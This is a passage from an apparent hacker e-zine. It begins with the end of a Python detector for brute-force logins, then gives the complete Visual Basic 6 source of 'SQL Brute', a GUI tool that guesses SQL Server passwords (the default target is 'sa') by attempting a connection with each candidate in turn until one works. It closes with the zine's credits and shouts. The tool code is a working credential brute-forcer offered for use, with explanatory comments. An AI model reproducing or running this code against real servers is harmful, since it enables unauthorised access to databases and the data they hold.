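    for kind, client, user, ts in detect(SAMPLE_LOG):
        print(f"{ts:%Y-%m-%d %H:%M:%S}  {kind:26s} client={client} login={user}")
```

At the roughly 23 guesses per second implied by the phile's own test, even a loose threshold trips within the first second, so the window mainly matters for slower, throttled guessing.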
SQL Brute Source Code By: H4v3n (Notes: main.FRX excluded due to mangled code) - main.FRM: VERSION 5.00 Begin VB.Form main BackColor = &H002E0502& Caption = "SQL Brute" ClientHeight = 6435 ClientLeft = 60 ClientTop = 450 ClientWidth = 3735 Icon = "main.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False ScaleHeight = 6435 ScaleWidth = 3735 StartUpPosition = 3 'Windows Default Begin VB.Frame Frame2 BackColor = &H002E0502& Caption = "Attack Strength" ForeColor = &H00FFFFFF& Height = 1695 Left = 120 TabIndex = 13 Top = 1200 Width = 3495 Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 3 Left = 2880 TabIndex = 17 Top = 1320 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 2 Left = 2880 TabIndex = 16 Top = 960 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 195 Index = 1 Left = 2880 TabIndex = 15 Top = 600 Width = 255 End Begin VB.OptionButton Option1 Alignment = 1 'Right Justify BackColor = &H002E0502& ForeColor = &H00FFFFFF& Height = 255 Index = 0 Left = 2880 TabIndex = 14 Top = 240 Value = -1 'True Width = 255 End Begin VB.Label Label9 BackColor = &H002E0502& Caption = "Crazy Strong (94 ASCII charactors)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 21 Top = 1320 Width = 2535 End Begin VB.Label Label8 BackColor = &H002E0502& Caption = "Strong (68 ASCII charactors)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 20 Top = 960 Width = 2175 End Begin VB.Label Label7 BackColor = &H002E0502& Caption = "Normal (lowercase alpha, numeric)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 19 Top = 600 Width = 2535 End Begin VB.Label Label6 BackColor = &H002E0502& Caption = "Weak (lowercase alpha)" ForeColor = &H00FFFFFF& Height = 255 Left = 360 TabIndex = 18 Top = 240 Width = 1815 End End 
   Begin VB.CommandButton cmdstop
      Caption = "Stop"
      Enabled = 0 'False
      Height = 495
      Left = 2040
      TabIndex = 12
      Top = 5760
      Width = 1455
   End
   Begin VB.Timer Timer1
      Enabled = 0 'False
      Interval = 1
      Left = 3000
      Top = 5760
   End
   Begin VB.Frame Frame1
      BackColor = &H002E0502&
      Caption = "Options"
      ForeColor = &H00FFFFFF&
      Height = 1815
      Left = 120
      TabIndex = 2
      Top = 3000
      Width = 3495
      Begin VB.TextBox txtprovider
         Height = 285
         Left = 1200
         TabIndex = 11
         Text = "MSDASQL.1"
         Top = 1320
         Width = 2175
      End
      Begin VB.TextBox txtuser
         Height = 285
         Left = 1200
         TabIndex = 8
         Text = "sa"
         Top = 960
         Width = 2175
      End
      Begin VB.TextBox txtsource
         Height = 285
         Left = 1200
         TabIndex = 6
         Top = 600
         Width = 2175
      End
      Begin VB.TextBox txtdatabase
         Height = 285
         Left = 1200
         TabIndex = 4
         Top = 240
         Width = 2175
      End
      Begin VB.Label Label5
         BackColor = &H002E0502&
         Caption = "Provider:"
         ForeColor = &H00FFFFFF&
         Height = 255
         Left = 360
         TabIndex = 10
         Top = 1320
         Width = 735
      End
      Begin VB.Label Label3
         BackColor = &H002E0502&
         Caption = "Username:"
         ForeColor = &H00FFFFFF&
         Height = 255
         Left = 240
         TabIndex = 7
         Top = 960
         Width = 855
      End
      Begin VB.Label Label2
         BackColor = &H002E0502&
         Caption = "Data Source:"
         ForeColor = &H00FFFFFF&
         Height = 255
         Left = 120
         TabIndex = 5
         Top = 600
         Width = 975
      End
      Begin VB.Label Label1
         BackColor = &H002E0502&
         Caption = "Database:"
         ForeColor = &H00FFFFFF&
         Height = 255
         Left = 360
         TabIndex = 3
         Top = 240
         Width = 855
      End
   End
   Begin VB.CommandButton cmdstart
      Caption = "Start"
      Default = -1 'True
      Height = 495
      Left = 240
      TabIndex = 1
      Top = 5760
      Width = 1455
   End
   Begin VB.TextBox txtpassword
      Height = 285
      Left = 120
      TabIndex = 0
      Top = 5280
      Width = 3495
   End
   Begin VB.Label Label4
      Alignment = 2 'Center
      BackColor = &H002E0502&
      Caption = "PASSWORD"
      ForeColor = &H00FFFFFF&
      Height = 255
      Left = 120
      TabIndex = 9
      Top = 4920
      Width = 3495
   End
   Begin VB.Image Image1
      Height = 1125
      Left = 0
      Picture = "main.frx":08CA
      Top = 0
      Width = 3750
   End
End
Attribute VB_Name = "main"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False

' Advance txtWeak to the next candidate, odometer style, over a-z
' (ASCII 97-122). When every position rolls over, the result is one
' character longer.
Function IncrementTextStringWeak(txtWeak As String) As String
   Dim L As Integer, i As Integer, c As Integer
   Dim S As String
   S = txtWeak
   L = Len(S)
   For i = L To 1 Step -1
      c = Asc(Mid(S, i, 1))
      Select Case c
         Case 97 To 121
            S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
            Exit For
         Case 122
            S = Left(S, i - 1) & "a" & Mid(S, i + 1)
      End Select
   Next i
   If i = 0 Then
      IncrementTextStringWeak = String(L + 1, 97)
   Else
      IncrementTextStringWeak = S
   End If
End Function

' Same scheme over 0-9 then a-z (ASCII 48-57 and 97-122).
Function IncrementTextStringNorm(txtNorm As String) As String
   Dim L As Integer, i As Integer, c As Integer
   Dim S As String
   S = txtNorm
   L = Len(S)
   For i = L To 1 Step -1
      c = Asc(Mid(S, i, 1))
      Select Case c
         Case 48 To 56, 97 To 121
            S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
            Exit For
         Case 57
            S = Left(S, i - 1) & "a" & Mid(S, i + 1)
            Exit For
         Case 122
            S = Left(S, i - 1) & "0" & Mid(S, i + 1)
      End Select
   Next i
   If i = 0 Then
      IncrementTextStringNorm = String(L + 1, 48)
   Else
      IncrementTextStringNorm = S
   End If
End Function

' Same scheme over ASCII 33-64 and 97-126; uppercase letters and
' ASCII 91-96 are skipped. These ranges hold 62 characters, although
' the form label says 68.
Function IncrementTextStringStrong(txtStrong As String) As String
   Dim L As Integer, i As Integer, c As Integer
   Dim S As String
   S = txtStrong
   L = Len(S)
   For i = L To 1 Step -1
      c = Asc(Mid(S, i, 1))
      Select Case c
         Case 33 To 63, 97 To 125
            S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
            Exit For
         Case 64
            S = Left(S, i - 1) & "a" & Mid(S, i + 1)
            Exit For
         Case 126
            S = Left(S, i - 1) & "!" & Mid(S, i + 1)
      End Select
   Next i
   If i = 0 Then
      IncrementTextStringStrong = String(L + 1, 33)
   Else
      IncrementTextStringStrong = S
   End If
End Function

' Same scheme over all 94 printable ASCII characters, 33-126.
Function IncrementTextStringCrazy(txtcrazy As String) As String
   Dim L As Integer, i As Integer, c As Integer
   Dim S As String
   S = txtcrazy
   L = Len(S)
   For i = L To 1 Step -1
      c = Asc(Mid(S, i, 1))
      Select Case c
         Case 33 To 125
            S = Left(S, i - 1) & Chr(c + 1) & Mid(S, i + 1)
            Exit For
         Case 126
            S = Left(S, i - 1) & "!" & Mid(S, i + 1)
      End Select
   Next i
   If i = 0 Then
      IncrementTextStringCrazy = String(L + 1, 33)
   Else
      IncrementTextStringCrazy = S
   End If
End Function

' strength is not declared anywhere in this form. It is presumably a
' Public variable in Mod.bas, which SQL_Brute.VBP lists but which is
' not included in this listing.
Public Sub Option1_Click(Index As Integer)
   Select Case Index
      Case 0
         strength = 0
      Case 1
         strength = 1
      Case 2
         strength = 2
      Case 3
         strength = 3
   End Select
End Sub

' Lock the form controls and start the timer.
Private Sub cmdstart_Click()
   Option1(0).Enabled = False
   Option1(1).Enabled = False
   Option1(2).Enabled = False
   Option1(3).Enabled = False
   txtdatabase.Enabled = False
   txtsource.Enabled = False
   txtpassword.Enabled = False
   txtuser.Enabled = False
   txtprovider.Enabled = False
   cmdstop.Default = True
   cmdstart.Enabled = False
   cmdstop.Enabled = True
   Timer1.Enabled = True
End Sub

' Unlock the form controls and stop the timer.
Private Sub cmdstop_Click()
   Option1(0).Enabled = True
   Option1(1).Enabled = True
   Option1(2).Enabled = True
   Option1(3).Enabled = True
   txtdatabase.Enabled = True
   txtsource.Enabled = True
   txtpassword.Enabled = True
   txtuser.Enabled = True
   txtprovider.Enabled = True
   cmdstart.Default = True
   cmdstart.Enabled = True
   cmdstop.Enabled = False
   Timer1.Enabled = False
End Sub

' Runs on every timer tick (Interval = 1): advance the candidate in
' txtpassword, then make one ADO connection attempt with it.
Private Sub Timer1_Timer()
   On Error GoTo ErrHandler
   Dim varserver As String
   Dim vardatabase As String
   Dim varuser As String
   Dim varpassword As String
   Dim varamount As String
   Dim cn As ADODB.Connection
   Dim conn As String
   Dim rs As ADODB.Recordset
   Dim sql As String
   Dim count As String
   Select Case strength
      Case 0
         txtpassword.Text = IncrementTextStringWeak(txtpassword.Text)
      Case 1
         txtpassword.Text = IncrementTextStringNorm(txtpassword.Text)
      Case 2
         txtpassword.Text = IncrementTextStringStrong(txtpassword.Text)
      Case 3
         txtpassword.Text = IncrementTextStringCrazy(txtpassword.Text)
   End Select
   conn = "Provider=" & txtprovider.Text
   conn = conn & ";Password="
   conn = conn & txtpassword.Text
   conn = conn & ";Persist Security Info=True;User ID="
   conn = conn & txtuser.Text
   conn = conn & ";Data Source="
   conn = conn & txtsource.Text
   Set cn = New ADODB.Connection
   cn.Open conn
   ' Reached only when Open raised no error: stop the timer and unlock
   ' the form, leaving the accepted value in txtpassword.
   cn.Close
   Set cn = Nothing
   Timer1.Enabled = False
   Option1(0).Enabled = True
   Option1(1).Enabled = True
   Option1(2).Enabled = True
   Option1(3).Enabled = True
   txtdatabase.Enabled = True
   txtsource.Enabled = True
   txtpassword.Enabled = True
   txtuser.Enabled = True
   txtprovider.Enabled = True
   cmdstart.Default = True
   cmdstart.Enabled = True
   cmdstop.Enabled = False
   Exit Sub
' Any error raised above, including a rejected login, lands here. The
' timer stays enabled, so the next tick tries the next candidate.
ErrHandler:
   If Not cn Is Nothing Then Set cn = Nothing
End Sub


- SQL_Brute.VBP:

Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\System32\STDOLE2.TLB#OLE Automation
Reference=*\G{00025E01-0000-0000-C000-000000000046}#4.0#0#..\..\..\..\..\..\Program Files\Common Files\Microsoft Shared\DAO\DAO350.DLL#Microsoft DAO 3.51 Object Library
Reference=*\G{00000206-0000-0010-8000-00AA006D2EA4}#2.6#0#..\..\..\..\..\..\Program Files\Common Files\system\ado\msado26.tlb#Microsoft ActiveX Data Objects 2.6 Library
Form=main.frm
Module=Mod; Mod.bas
IconForm="main"
Startup="main"
HelpFile=""
Title="SQL Brute"
ExeName32="SQL Brute.exe"
Command32=""
Name="SQL_Brute"
HelpContextID="0"
Description="SQL Brute Force Attack"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=13
AutoIncrementVer=1
ServerSupportFiles=0
VersionCompanyName="h4v3n"
VersionProductName="SQL Brute"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1


- SQL_Brute.VBW:

main = 15, 19, 606, 467, , 428, 11, 727, 539, C
Mod = 66, 87, 674, 543, Z


-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Credits:

Without the following contributions, this 'zine issue would be fairly delayed
or not released. So thank you to the following groovy people:

Aestetix, Acid Data, Aftermath, Cyburnetiks, CYB0RG/ASM, DoobieEx, Fr0st,
H4v3n, Omin0us, The Clone, and lastly; War.

Shouts:

CYB0RG/ASM, Fractal, h410G3n, Wizbone, The Question, Phlux, Magma,
Hack Canada, port9, Nyxojaele, Ms.O, Tr00per, Flopik, jimmiejaz,
*Senorita Chandelier*, Kankraka, war, Aftermath, Aestetix, DoobieEx, io,
Pinguino, nato, cyburnetiks, hypatia, coercion, tek, Nikita-dawg, h4v3n,
0min0us, sub, Alan, Kybo Ren, persephone, Kevin Poulsen (good luck at
Wired News!), Emmanuel Goldstein (thank you for the free Nettwerked/K-1ine
marketplace ad), the irc #hackcanada channel, The Nettwerked Meeting Crew,
Nettwerked Radio artists and listeners and the entire Canadian H/P scene.

Rest in Peace: The American Constitution and Canadians' rights to Privacy
(fuck you BarLink -- give these fucks a piece of your mind:
(780) 405-1045 ...)

A   N E T T W E R K E D   P R O D U C T

Copywrong (c) 1999 -> 2005 -> 20?? ... dun dun dun!